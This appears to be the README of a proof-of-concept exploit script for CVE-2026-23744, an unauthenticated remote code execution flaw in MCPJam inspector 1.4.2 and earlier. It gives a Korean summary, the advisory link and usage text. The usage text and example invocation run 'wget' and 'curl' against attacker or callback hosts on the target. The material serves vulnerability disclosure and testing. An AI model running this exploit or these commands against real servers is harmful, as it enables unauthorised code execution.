
CVE-2026-23744에 대한 개념 증명 익스플로잇으로, MCPJam inspector <= 1.4.2의 인증되지 않은 원격 코드 실행 취약점으로, 취약한 대상에서 명령 실행을 허용합니다.
CVE-2026-23744
MCPJam inspector <= 1.4.2에서의 RCE
https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6
usage: mcpjaminspector-unauth-rce.py [-h] --target TARGET --command COMMAND
options:
-h, --help show this help message and exit
--target TARGET Target e.g https://127.0.0.1
--command COMMAND Command to exec on remote target. e.g: wget http://YOU/f
python3 mcpjaminspector-unauth-rce.py --target "http://mymcp.local/" --command "curl http://myinteractsh.local/test"